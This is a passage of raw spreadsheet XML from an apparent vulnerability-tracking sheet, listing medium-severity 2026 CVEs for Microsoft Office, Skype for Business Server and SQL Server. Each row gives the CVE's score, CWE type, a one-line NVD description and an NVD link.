r="L1614" s="5" t="inlineStr" /><c r="M1614" s="5" t="inlineStr" /><c r="N1614" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1614" s="5" t="inlineStr" /><c r="Q1614" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1614" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S1614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t></is></c></row><row r="1615"><c r="A1615" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1615" s="5" t="inlineStr"><is><t>CVE-2026-66303</t></is></c><c r="D1615" s="5" t="n"><v>6.5</v></c><c r="E1615" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1615" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1615" s="5" t="inlineStr" /><c r="H1615" s="5" t="n"><v>0.008</v></c><c r="I1615" s="5" t="inlineStr" /><c r="J1615" s="5" t="inlineStr" /><c r="K1615" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1615" s="5" t="inlineStr" /><c r="M1615" s="5" t="inlineStr" /><c r="N1615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1615" s="5" t="inlineStr" /><c r="Q1615" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1615" s="5" t="inlineStr"><is><t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="S1615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t></is></c></row><row r="1616"><c r="A1616" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1616" s="5" t="inlineStr"><is><t>CVE-2026-66306</t></is></c><c r="D1616" s="5" t="n"><v>6.5</v></c><c r="E1616" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1616" s="5" t="inlineStr" /><c r="H1616" s="5" t="n"><v>0.005</v></c><c r="I1616" s="5" t="inlineStr" /><c r="J1616" s="5" t="inlineStr" /><c r="K1616" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1616" s="5" t="inlineStr" /><c r="M1616" s="5" t="inlineStr" /><c r="N1616" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1616" s="5" t="inlineStr" /><c r="Q1616" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="R1616" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1616" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t></is></c></row><row r="1617"><c r="A1617" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1617" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1617" s="5" t="inlineStr"><is><t>CVE-2026-66308</t></is></c><c r="D1617" s="5" t="n"><v>6.5</v></c><c r="E1617" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1617" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1617" s="5" t="inlineStr" /><c r="H1617" s="5" t="n"><v>0.006</v></c><c r="I1617" s="5" t="inlineStr" /><c r="J1617" s="5" t="inlineStr" /><c r="K1617" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1617" s="5" t="inlineStr" /><c r="M1617" s="5" t="inlineStr" /><c r="N1617" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1617" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1617" s="5" t="inlineStr" /><c r="Q1617" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1617" s="5" t="inlineStr"><is><t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="S1617" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t></is></c></row><row r="1618"><c r="A1618" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1618" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1618" s="5" t="inlineStr"><is><t>CVE-2026-66816</t></is></c><c r="D1618" s="5" t="n"><v>6.5</v></c><c r="E1618" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1618" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1618" s="5" t="inlineStr" /><c r="H1618" s="5" t="n"><v>0.007</v></c><c r="I1618" s="5" t="inlineStr" /><c r="J1618" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1618" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1618" s="5" t="inlineStr" /><c r="M1618" s="5" t="inlineStr" /><c r="N1618" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1618" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1618" s="5" t="inlineStr" /><c r="Q1618" s="5" t="inlineStr"><is><t>CWE-778</t></is></c><c r="R1618" s="5" t="inlineStr"><is><t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t></is></c><c r="S1618" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t></is></c></row><row r="1619"><c r="A1619" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1619" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1619" s="5" t="inlineStr"><is><t>CVE-2026-67369</t></is></c><c r="D1619" s="5" t="n"><v>6.5</v></c><c r="E1619" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1619" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1619" s="5" t="inlineStr" /><c r="H1619" s="5" t="n"><v>0.007</v></c><c r="I1619" s="5" t="inlineStr" /><c r="J1619" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1619" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1619" s="5" t="inlineStr" /><c r="M1619" s="5" t="inlineStr" /><c r="N1619" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1619" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1619" s="5" t="inlineStr" /><c r="Q1619" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1619" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t></is></c></row><row r="1620"><c r="A1620" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1620" s="5" t="inlineStr"><is><t>CVE-2026-67383</t></is></c><c r="D1620" s="5" t="n"><v>6.5</v></c><c r="E1620" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1620" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1620" s="5" t="inlineStr" /><c r="H1620" s="5" t="n"><v>0.01</v></c><c r="I1620" s="5" t="inlineStr" /><c r="J1620" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1620" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1620" s="5" t="inlineStr" /><c r="M1620" s="5" t="inlineStr" /><c r="N1620" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1620" s="5" t="inlineStr" /><c r="Q1620" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="R1620" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t></is></c></row><row r="1621"><c r="A1621" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1621" s="5" t="inlineStr"><is><t>CVE-2026-67386</t></is></c><c r="D1621" s="5" t="n"><v>6.5</v></c><c r="E1621" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1621" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1621" s="5" t="inlineStr" /><c r="H1621" s="5" t="n"><v>0.007</v></c><c r="I1621" s="5" t="inlineStr" /><c r="J1621" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1621" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1621" s="5" t="inlineStr" /><c r="M1621" s="5" t="inlineStr" /><c r="N1621" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1621" s="5" t="inlineStr" /><c r="Q1621" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1621" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1621" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t></is></c></row><row r="1622"><c r="A1622" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1622" s="5" t="inlineStr"><is><t>CVE-2026-67389</t></is></c><c r="D1622" s="5" t="n"><v>6.5</v></c><c r="E1622" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1622" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1622" s="5" t="inlineStr" /><c r="H1622" s="5" t="n"><v>0.007</v></c><c r="I1622" s="5" t="inlineStr" /><c r="J1622" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1622" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1622" s="5" t="inlineStr" /><c r="M1622" s="5" t="inlineStr" /><c r="N1622" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1622" s="5" t="inlineStr" /><c r="Q1622" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1622" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1622" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t></is></c></row><row r="1623"><c r="A1623" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1623" s="5" t="inlineStr"><is><t>CVE-2026-67390</t></is></c><c r="D1623" s="5" t="n"><v>6.5</v></c><c r="E1623" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1623" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1623" s="5" t="inlineStr" /><c r="H1623" s="5" t="n"><v>0.01</v></c><c r="I1623" s="5" t="inlineStr" /><c r="J1623" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1623" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1623" s="5" t="inlineStr" /><c r="M1623" s="5" t="inlineStr" /><c r="N1623" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1623" s="5" t="inlineStr" /><c r="Q1623" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1623" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1623" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t></is></c></row><row r="1624"><c r="A1624" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1624" s="5" t="inlineStr"><is><t>CVE-2026-67393</t></is></c><c r="D1624" s="5" t="n"><v>6.5</v></c><c r="E1624" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1624" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1624" s="5" t="inlineStr" /><c r="H1624" s="5" t="n"><v>0.007</v></c><c r="I1624" s="5" t="inlineStr" /><c r="J1624" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1624" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1624" s="5" t="inlineStr" /><c r="M1624" s="5" t="inlineStr" /><c r="N1624" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1624" s="5" t="inlineStr" /><c r="Q1624" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1624" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t></is></c></row><row r="1625"><c r="A1625" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1625" s="5" t="inlineStr"><is><t>CVE-2026-67624</t></is></c><c r="D1625" s="5" t="n"><v>6.5</v></c><c r="E1625" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1625" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1625" s="5" t="inlineStr" /><c r="H1625" s="5" t="n"><v>0.006</v></c><c r="I1625" s="5" t="inlineStr" /><c r="J1625" s="5" t="inlineStr" /><c r="K1625" s="5" t="inlineStr" /><c r="L1625" s="5" t="inlineStr" /><c r="M1625" s="5" t="inlineStr" /><c r="N1625" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1625" s="5" t="inlineStr" /><c r="Q1625" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1625" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67624</t></is></c></row><row r="1626"><c r="A1626" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1626" s="5" t="inlineStr"><is><t>CVE-2026-67629</t></is></c><c r="D1626" s="5" t="n"><v>6.5</v></c><c r="E1626" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1626" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1626" s="5" t="inlineStr" /><c r="H1626" s="5" t="n"><v>0.007</v></c><c r="I1626" s="5" t="inlineStr" /><c r="J1626" s="5" t="inlineStr" /><c r="K1626" s="5" t="inlineStr" /><c r="L1626" s="5" t="inlineStr" /><c r="M1626" s="5" t="inlineStr" /><c r="N1626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1626" s="5" t="inlineStr" /><c r="Q1626" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1626" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67629</t></is></c></row><row r="1627"><c r="A1627" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1627" s="5" t="inlineStr"><is><t>CVE-2026-67630</t></is></c><c r="D1627" s="5" t="n"><v>6.5</v></c><c r="E1627" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1627" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1627" s="5" t="inlineStr" /><c r="H1627" s="5" t="n"><v>0.007</v></c><c r="I1627" s="5" t="inlineStr" /><c r="J1627" s="5" t="inlineStr" /><c r="K1627" s="5" t="inlineStr" /><c r="L1627" s="5" t="inlineStr" /><c r="M1627" s="5" t="inlineStr" /><c r="N1627" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1627" s="5" t="inlineStr" /><c r="Q1627" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1627" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67630</t></is></c></row><row r="1628"><c r="A1628" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1628" s="5" t="inlineStr"><is><t>CVE-2026-67633</t></is></c><c r="D1628" s="5" t="n"><v>6.5</v></c><c r="E1628" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1628" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1628" s="5" t="inlineStr" /><c r="H1628" s="5" t="n"><v>0.008</v></c><c r="I1628" s="5" t="inlineStr" /><c r="J1628" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1628" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1628" s="5" t="inlineStr" /><c r="M1628" s="5" t="inlineStr" /><c r="N1628" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1628" s="5" t="inlineStr" /><c r="Q1628" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1628" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="S1628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t></is></c></row><row r="1629"><c r="A1629" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1629" s="5" t="inlineStr"><is><t>CVE-2026-67641</t></is></c><c r="D1629" s="5" t="n"><v>6.5</v></c><c r="E1629" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1629" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1629" s="5" t="inlineStr" /><c r="H1629" s="5" t="n"><v>0.006</v></c><c r="I1629" s="5" t="inlineStr" /><c r="J1629" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1629" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1629" s="5" t="inlineStr" /><c r="M1629" s="5" t="inlineStr" /><c r="N1629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1629" s="5" t="inlineStr" /><c r="Q1629" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1629" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="S1629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t></is></c></row><row r="1630"><c r="A1630" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1630" s="5" t="inlineStr"><is><t>CVE-2026-67645</t></is></c><c r="D1630" s="5" t="n"><v>6.5</v></c><c r="E1630" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1630" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1630" s="5" t="inlineStr" /><c r="H1630" s="5" t="n"><v>0.006</v></c><c r="I1630" s="5" t="inlineStr" /><c r="J1630" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1630" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1630" s="5" t="inlineStr" /><c r="M1630" s="5" t="inlineStr" /><c r="N1630" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1630" s="5" t="inlineStr" /><c r="Q1630" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1630" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t></is></c></row><row r="1631"><c r="A1631" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1631" s="5" t="inlineStr"><is><t>CVE-2026-67648</t></is></c><c r="D1631" s="5" t="n"><v>6.5</v></c><c r="E1631" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1631" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1631" s="5" t="inlineStr" /><c r="H1631" s="5" t="n"><v>0.006</v></c><c r="I1631" s="5" t="inlineStr" /><c r="J1631" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1631" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1631" s="5" t="inlineStr" /><c r="M1631" s="5" t="inlineStr" /><c r="N1631" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1631" s="5" t="inlineStr" /><c r="Q1631" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1631" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t></is></c></row><row r="1632"><c r="A1632" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1632" s="5" t="inlineStr"><is><t>CVE-2026-68776</t></is></c><c r="D1632" s="5" t="n"><v>6.5</v></c><c r="E1632" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1632" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1632" s="5" t="inlineStr" /><c r="H1632" s="5" t="n"><v>0.006</v></c><c r="I1632" s="5" t="inlineStr" /><c r="J1632" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1632" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1632" s="5" t="inlineStr" /><c r="M1632" s="5" t="inlineStr" /><c r="N1632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1632" s="5" t="inlineStr" /><c r="Q1632" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1632" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t></is></c></row><row r="1633"><c r="A1633" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1633" s="5" t="inlineStr"><is><t>CVE-2026-68777</t></is></c><c r="D1633" s="5" t="n"><v>6.5</v></c><c r="E1633" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1633" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1633" s="5" t="inlineStr" /><c r="H1633" s="5" t="n"><v>0.007</v></c><c r="I1633" s="5" t="inlineStr" /><c r="J1633" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1633" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1633" s="5" t="inlineStr" /><c r="M1633" s="5" t="inlineStr" /><c r="N1633" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1633" s="5" t="inlineStr" /><c r="Q1633" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1633" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t></is></c></row><row r="1634"><c r="A1634" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1634" s="5" t="inlineStr"><is><t>CVE-2026-68778</t></is></c><c r="D1634" s="5" t="n"><v>6.5</v></c><c r="E1634" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1634" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1634" s="5" t="inlineStr" /><c r="H1634" s="5" t="n"><v>0.007</v></c><c r="I1634" s="5" t="inlineStr" /><c r="J1634" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1634" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1634" s="5" t="inlineStr" /><c r="M1634" s="5" t="inlineStr" /><c r="N1634" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1634" s="5" t="inlineStr" /><c r="Q1634" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1634" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t></is></c></row><row r="1635"><c r="A1635" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1635" s="5" t="inlineStr"><is><t>CVE-2026-68779</t></is></c><c r="D1635" s="5" t="n"><v>6.5</v></c><c r="E1635" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1635" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1635" s="5" t="inlineStr" /><c r="H1635" s="5" t="n"><v>0.006</v></c><c r="I1635" s="5" t="inlineStr" /><c r="J1635" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1635" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1635" s="5" t="inlineStr" /><c r="M1635" s="5" t="inlineStr" /><c r="N1635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1635" s="5" t="inlineStr" /><c r="Q1635" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1635" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t></is></c></row><row r="1636"><c r="A1636" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1636" s="5" t="inlineStr"><is><t>CVE-2026-68780</t></is></c><c r="D1636" s="5" t="n"><v>6.5</v></c><c r="E1636" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1636" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1636" s="5" t="inlineStr" /><c r="H1636" s="5" t="n"><v>0.007</v></c><c r="I1636" s="5" 